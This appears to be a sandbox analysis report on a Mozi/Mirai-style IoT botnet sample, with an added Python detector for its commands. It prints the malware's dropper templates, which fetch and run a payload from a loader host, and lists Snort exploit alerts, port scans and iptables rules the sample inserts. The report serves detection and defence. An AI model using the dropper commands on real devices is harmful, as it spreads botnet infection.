Source: Mozi.m, String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: Mozi.m, String (a run of adjacent string-table entries, recognisably telnet login/prompt tokens, followed by the same dropper template): nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
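
The two dropper strings are printf templates: after a successful telnet login or exploit, the scanner fills the `%s:%d` placeholders with its loader host and port and sends the rendered command line to the victim. The structure is the classic Mirai one: probe a list of directories for a writable one by creating a `.x` marker file and `cd`-ing into the first that succeeds, fetch the payload with whichever of `wget`, `curl` or `busybox wget` exists, and if `chmod 777` fails, copy `/bin/ls` and overwrite the copy with the payload so the file inherits the executable bit. The following detector is an added example, not part of the report or of the sample: it renders the template with a constructed loader address (a TEST-NET-1 address, not an observed one), scores a command line against the structural indicators, and extracts the probed directories and download URLs, which is what you would run over telnet honeypot or shell-command logs. The indicator names and thresholds are mine.

```python
import re

# The "i" dropper template exactly as listed in the report above; at runtime the sample
# fills each %s:%d with the loader host/port and the final %s with a marker it echoes back.
TEMPLATE = (
    ">/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;"
    ">/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;"
    "wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;"
    "chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'"
)


def render(template, host, port, marker):
    """Emulate the sample's printf-style expansion so a concrete command line can be tested."""
    return template.replace('%s:%d', f'{host}:{port}').replace('%s', marker)


# Structural indicators of the Mirai-style dropper one-liner (names are mine).
INDICATORS = {
    'writable_dir_probe':  re.compile(r'>/\S+?/\.x&&cd '),                  # touch marker file, cd on success
    'multi_fetch':         re.compile(r'(?:wget|curl -O|busybox wget) https?://'),
    'chmod_777':           re.compile(r'chmod 777 \S+'),
    'ls_copy_trick':       re.compile(r'cp /bin/ls \S+;cat \S+>\S+'),       # inherit +x from a copy of ls
    'busybox_echo_marker': re.compile(r"/bin/busybox echo -e '"),
}


def dropper_indicators(cmd):
    """Which of the structural indicators a command line shows."""
    return {name: bool(rx.search(cmd)) for name, rx in INDICATORS.items()}


def is_mirai_style_dropper(cmd, threshold=3):
    """True when at least `threshold` indicators are present; a lone wget/curl does not qualify."""
    return sum(dropper_indicators(cmd).values()) >= threshold


def writable_dir_probes(cmd):
    """Directories the dropper tries, in order, as a writable working directory."""
    return [d for d, _ in re.findall(r'>(/[^;&>]*?)/\.x&&cd ([^;]+);', cmd)]


def download_urls(cmd):
    """Payload URLs referenced by the command line (loader IOCs to block and hunt for)."""
    return sorted(set(re.findall(r'https?://[^\s;|\'"]+', cmd)))


# Constructed inputs: a rendered dropper with a TEST-NET-1 loader, and a benign update command.
RENDERED = render(TEMPLATE, '192.0.2.10', 8088, 'MOZI')
BENIGN = "cd /tmp && wget http://192.0.2.10/update.tgz && tar xzf update.tgz"

if __name__ == '__main__':
    print(dropper_indicators(RENDERED))
    print(writable_dir_probes(RENDERED))
    print(download_urls(RENDERED))
    print(is_mirai_style_dropper(RENDERED), is_mirai_style_dropper(BENIGN))
```

The probe list doubles as a host-side IOC: a stray `.x` file in `/var/run`, `/mnt`, `/usr`, `/dev`, `/dev/shm`, `/tmp` or `/var` on an embedded device is a cheap sign that this dropper ran there, whether or not the payload still exists.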
Opens /proc/net/* files useful for finding connected devices and routers
Source: /tmp/Mozi.m (PID: 4603), Opens: /proc/net/route (two occurrences)

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic (dump.pcap). Each entry is SID, rule message, source -> destination; 192.168.2.20 is the sandbox guest running the sample, and ICMP alerts carry no ports.
Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:47982 -> 23.44.146.105:80
Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:47982 -> 23.44.146.105:80
Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.44.146.105:80 -> 192.168.2.20:47982
Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 83.163.237.112: -> 192.168.2.20:
Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.165.139.60: -> 192.168.2.20:
Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 195.229.0.147: -> 192.168.2.20:
Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 38.104.123.122: -> 192.168.2.20:
Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 78.54.73.174: -> 192.168.2.20:
Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 67.187.218.82: -> 192.168.2.20:
Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:51592 -> 35.168.169.85:80
Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:51592 -> 35.168.169.85:80
Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:54436 -> 107.170.200.206:80
Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 59.99.92.197:32998 -> 192.168.2.20:14165
Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 117.202.68.123:8080 -> 192.168.2.20:14165
Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 220.77.193.240:5353 -> 192.168.2.20:14165
Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 117.215.212.106:18221 -> 192.168.2.20:14165
Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:59680 -> 115.15.161.14:8080
Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:59680 -> 115.15.161.14:8080
Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 77.190.174.8: -> 192.168.2.20:
Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 81.228.84.35: -> 192.168.2.20:
Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:52344 -> 107.154.165.234:80
Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:52344 -> 107.154.165.234:80
Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:49116 -> 195.154.172.83:80
Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:49116 -> 195.154.172.83:80
Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:59784 -> 158.199.197.56:80
Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:59784 -> 158.199.197.56:80
Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:45960 -> 104.97.230.229:80
Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:45960 -> 104.97.230.229:80
Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.97.230.229:80 -> 192.168.2.20:45960
Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 80.140.241.117: -> 192.168.2.20:
Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:52400 -> 66.49.194.21:80
Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:52400 -> 66.49.194.21:80
Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:34684 -> 203.146.142.202:80
Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:46778 -> 23.243.117.203:8080
Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:46778 -> 23.243.117.203:8080
Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:34684 -> 203.146.142.202:80
Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:36646 -> 104.238.159.33:80
Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:36646 -> 104.238.159.33:80
Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.164.1.124: -> 192.168.2.20:
Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 185.181.181.25: -> 192.168.2.20:
Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:48360 -> 54.164.156.191:80
Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:48360 -> 54.164.156.191:80
Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:50064 -> 107.20.106.251:80
Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:50064 -> 107.20.106.251:80
Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.20:52998 -> 116.206.55.142:52869
Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:35196 -> 104.115.250.114:80
Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:35196 -> 104.115.250.114:80
Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.115.250.114:80 -> 192.168.2.20:35196
Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 129.16.2.234: -> 192.168.2.20:
Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.152.114.5: -> 192.168.2.20:
Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 168.95.157.5: -> 192.168.2.20:
Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.59.216.67: -> 192.168.2.20:
Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 154.95.78.148: -> 192.168.2.20:
Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:47542 -> 45.196.102.179:80
Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:47542 -> 45.196.102.179:80
Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 31.150.96.14: -> 192.168.2.20:
Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.165.182.127: -> 192.168.2.20:
Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:37970 -> 175.252.8.184:8080
Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:37970 -> 175.252.8.184:8080
Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 211.227.96.15:57445 -> 192.168.2.20:14165
Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 149.11.89.129: -> 192.168.2.20:
Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 134.97.128.247: -> 192.168.2.20:
Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.37.130.69: -> 192.168.2.20:
Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:42922 -> 23.96.36.243:80
Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:42922 -> 23.96.36.243:80
Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 94.218.155.42: -> 192.168.2.20:
Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.155.180.12: -> 192.168.2.20:
Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 4.16.0.234: -> 192.168.2.20:
Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 193.203.0.195: -> 192.168.2.20:
Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:44286 -> 34.117.168.156:80
Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:51602 -> 104.98.58.115:80
Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:51602 -> 104.98.58.115:80
Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.98.58.115:80 -> 192.168.2.20:51602
Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:47394 -> 15.206.172.134:80
Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:47394 -> 15.206.172.134:80
Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 107.164.203.92: -> 192.168.2.20:
Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.218.46.16:80 -> 192.168.2.20:60196
Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:60196 -> 23.218.46.16:80
Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.192.4.224: -> 192.168.2.20:
Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:60130 -> 99.61.64.177:8080
Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:60130 -> 99.61.64.177:8080
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.210.243.211: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 217.196.225.4: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 24.215.105.193: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.92.141.24: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 187.18.116.82: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 216.221.97.226: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 203.116.7.190: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:44974 -> 192.155.170.244:80
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:44974 -> 192.155.170.244:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.148.141.21: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:57262 -> 51.178.69.101:80
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:53646 -> 184.31.173.81:80
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:53236 -> 66.201.89.13:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:53236 -> 66.201.89.13:80
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:53646 -> 184.31.173.81:80
                Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 184.31.173.81:80 -> 192.168.2.20:53646
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 222.227.19.236: -> 192.168.2.20:
                Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.218.148.138:80 -> 192.168.2.20:46816
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:46816 -> 23.218.148.138:80
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:59382 -> 45.195.180.141:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:59382 -> 45.195.180.141:80
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:55652 -> 38.87.83.34:80
                Connects to many ports of the same IP (likely port scanning)
                Source: global traffic | TCP traffic: 133.162.173.63 ports 1,2,4,5,9,49152
                Source: global traffic | TCP traffic: 112.127.196.238 ports 2,5,6,8,9,52869
                Source: global traffic | TCP traffic: 43.143.2.136 ports 1,2,4,5,9,49152
                Source: global traffic | TCP traffic: 197.181.82.192 ports 2,5,6,8,9,52869
                Source: global traffic | TCP traffic: 146.149.143.40 ports 1,2,3,5,7,37215
                Source: global traffic | TCP traffic: 109.196.110.179 ports 1,2,4,5,9,49152
                Source: global traffic | TCP traffic: 50.74.153.237 ports 2,5,6,8,9,52869
                Source: global traffic | TCP traffic: 141.145.10.198 ports 1,2,4,5,9,49152
                Source: global traffic | TCP traffic: 7.39.247.208 ports 1,2,3,5,7,37215
                Source: global traffic | TCP traffic: 11.90.50.158 ports 2,5,6,8,9,52869
                Source: global traffic | TCP traffic: 182.104.216.147 ports 2,5,6,8,9,52869
                Source: global traffic | TCP traffic: 103.36.247.14 ports 1,2,3,5,7,37215
                Source: global traffic | TCP traffic: 72.80.79.250 ports 2,5,6,8,9,52869
                Source: global traffic | TCP traffic: 195.12.213.244 ports 1,2,4,5,9,49152
                Source: global traffic | TCP traffic: 11.229.75.234 ports 1,2,4,5,9,49152
                Source: global traffic | TCP traffic: 162.68.221.250 ports 1,2,4,5,9,49152
                Source: global traffic | TCP traffic: 16.65.75.160 ports 2,5,6,8,9,52869
                Source: global traffic | TCP traffic: 82.24.32.9 ports 1,2,4,5,9,49152
                Source: global traffic | TCP traffic: 20.162.77.171 ports 1,2,3,5,7,37215
                Source: global traffic | TCP traffic: 1.30.247.172 ports 1,2,3,5,7,37215
                Source: global traffic | TCP traffic: 53.96.67.14 ports 1,2,3,5,7,37215
                Source: global traffic | TCP traffic: 200.240.85.208 ports 2,5,6,8,9,52869
                Source: global traffic | TCP traffic: 54.24.9.195 ports 1,2,3,5,7,37215
                Source: global traffic | TCP traffic: 39.174.77.150 ports 1,2,4,5,9,49152
                Source: global traffic | TCP traffic: 86.99.33.243 ports 2,5,6,8,9,52869
                Source: global traffic | TCP traffic: 220.149.177.74 ports 1,2,4,5,9,49152
                Source: global traffic | TCP traffic: 168.246.111.26 ports 1,2,3,5,7,37215
                Source: global traffic | TCP traffic: 36.138.107.187 ports 1,2,4,5,9,49152
                Source: global traffic | TCP traffic: 81.141.9.101 ports 1,2,4,5,9,49152
                Source: global traffic | TCP traffic: 36.77.151.76 ports 1,2,4,5,9,49152
                Source: global traffic | TCP traffic: 220.248.226.183 ports 1,2,3,5,7,37215
                Source: global traffic | TCP traffic: 186.119.243.90 ports 1,2,4,5,9,49152
                Source: global traffic | TCP traffic: 183.132.135.144 ports 1,2,4,5,9,49152
                Source: global traffic | TCP traffic: 82.65.114.102 ports 1,2,3,5,7,37215
                Source: global traffic | TCP traffic: 206.186.242.243 ports 2,5,6,8,9,52869
                Source: global traffic | TCP traffic: 68.124.102.212 ports 2,5,6,8,9,52869
                Source: global traffic | TCP traffic: 108.77.7.163 ports 1,2,4,5,9,49152
                Source: global traffic | TCP traffic: 149.189.159.233 ports 1,2,3,5,7,37215
                Source: global traffic | TCP traffic: 139.220.80.168 ports 1,2,3,5,7,37215
                Source: global traffic | TCP traffic: 182.157.115.73 ports 1,2,4,5,9,49152
                Source: global traffic | TCP traffic: 89.4.36.102 ports 1,2,3,5,7,37215
                Source: global traffic | TCP traffic: 29.202.233.5 ports 1,2,3,5,7,37215
                Source: global traffic | TCP traffic: 121.189.109.57 ports 2,5,6,8,9,52869
                Source: global traffic | TCP traffic: 214.108.114.69 ports 2,5,6,8,9,52869
                Source: global traffic | TCP traffic: 111.83.52.99 ports 2,5,6,8,9,52869
                Source: global traffic | TCP traffic: 108.73.168.86 ports 1,2,3,5,7,37215
                Source: global traffic | TCP traffic: 11.202.4.51 ports 1,2,3,5,7,37215
                Source: global traffic | TCP traffic: 158.202.85.201 ports 2,5,6,8,9,52869
                Source: global traffic | TCP traffic: 108.86.208.185 ports 2,5,6,8,9,52869
                Source: global traffic | TCP traffic: 218.184.12.7 ports 2,5,6,8,9,52869
                Source: global traffic | TCP traffic: 182.58.239.246 ports 1,2,4,5,9,49152
                Source: global traffic | TCP traffic: 123.237.248.195 ports 2,5,6,8,9,52869
                Source: global traffic | TCP traffic: 49.44.95.153 ports 1,2,3,5,7,37215
                Source: global traffic | TCP traffic: 86.150.240.234 ports 1,2,3,5,7,37215
                Source: global traffic | TCP traffic: 14.134.169.239 ports 1,2,3,5,7,37215
                Source: global traffic | TCP traffic: 189.5.233.211 ports 2,5,6,8,9,52869
                Source: global traffic | TCP traffic: 41.206.221.126 ports 1,2,3,5,7,37215
                Source: global traffic | TCP traffic: 174.252.187.249 ports 1,2,3,5,7,37215
                Source: global traffic | TCP traffic: 38.24.144.193 ports 2,5,6,8,9,52869
                Source: global traffic | TCP traffic: 24.29.191.22 ports 2,5,6,8,9,52869
                Source: global traffic | TCP traffic: 122.246.229.135 ports 2,5,6,8,9,52869
                Source: global traffic | TCP traffic: 93.175.160.79 ports 2,5,6,8,9,52869
                Source: global traffic | TCP traffic: 180.194.184.80 ports 1,2,3,5,7,37215
                Source: global traffic | TCP traffic: 14.73.117.144 ports 2,5,6,8,9,52869
                Source: global traffic | TCP traffic: 201.84.237.163 ports 2,5,6,8,9,52869
                Source: global traffic | TCP traffic: 180.56.86.107 ports 2,5,6,8,9,52869
                Source: global traffic | TCP traffic: 208.202.72.240 ports 1,2,4,5,9,49152
                Source: global traffic | TCP traffic: 1.212.26.57 ports 2,5,6,8,9,52869
                Executes the "iptables" command to insert, remove and/or manipulate rules
                Source: /bin/sh (PID: 4618) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4652) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4655) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4699) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4708) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4736) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4742) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4761) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4877) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                Source: /bin/sh (PID: 4880) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                Source: /bin/sh (PID: 4883) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
                Source: /bin/sh (PID: 4892) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                Source: /bin/sh (PID: 4950) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                Source: /bin/sh (PID: 4985) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                Source: /bin/sh (PID: 5011) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                Source: /bin/sh (PID: 5014) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                Source: /bin/sh (PID: 5019) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                Source: /bin/sh (PID: 5044) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                Source: /bin/sh (PID: 5079) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
                Source: /bin/sh (PID: 5105) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
                Source: /bin/sh (PID: 5121) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                Source: /bin/sh (PID: 5144) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                Source: /bin/sh (PID: 5152) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
                Source: /bin/sh (PID: 5183) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                Source: /bin/sh (PID: 5201) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5204) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5207) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5211) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5232) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 14165 -j ACCEPT
                Source: /bin/sh (PID: 5268) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 14165 -j ACCEPT
                Source: /bin/sh (PID: 5303) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 14165 -j ACCEPT
                Source: /bin/sh (PID: 5333) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 14165 -j ACCEPT
                Uses known network protocols on non-standard ports
                Source: unknown | Network traffic detected: HTTP traffic on port 34926 -> 49152
                Source: unknown | Network traffic detected: HTTP traffic on port 49152 -> 34926
                Source: unknown | Network traffic detected: HTTP traffic on port 52998 -> 52869
                Source: unknown | Network traffic detected: HTTP traffic on port 52998 -> 52869
                Source: unknown | Network traffic detected: HTTP traffic on port 52998 -> 52869
                Source: unknown | Network traffic detected: HTTP traffic on port 52998 -> 52869
                Source: unknown | Network traffic detected: HTTP traffic on port 52998 -> 52869
                Source: unknown | Network traffic detected: HTTP traffic on port 52998 -> 52869
                Source: unknown | Network traffic detected: HTTP traffic on port 52998 -> 52869
                Source: unknown | Network traffic detected: HTTP traffic on port 52998 -> 52869
                Source: unknown | Network traffic detected: HTTP traffic on port 40718 -> 8443
                Source: unknown | Network traffic detected: HTTP traffic on port 52998 -> 52869
                Source: global traffic | TCP traffic: 192.168.2.20:53930 -> 162.234.162.7:8080
                Source: global traffic | TCP traffic: 192.168.2.20:32874 -> 49.44.95.153:37215
                Source: global traffic | TCP traffic: 192.168.2.20:45040 -> 155.152.8.152:5555
                Source: global traffic | TCP traffic: 192.168.2.20:54864 -> 214.112.173.213:8080
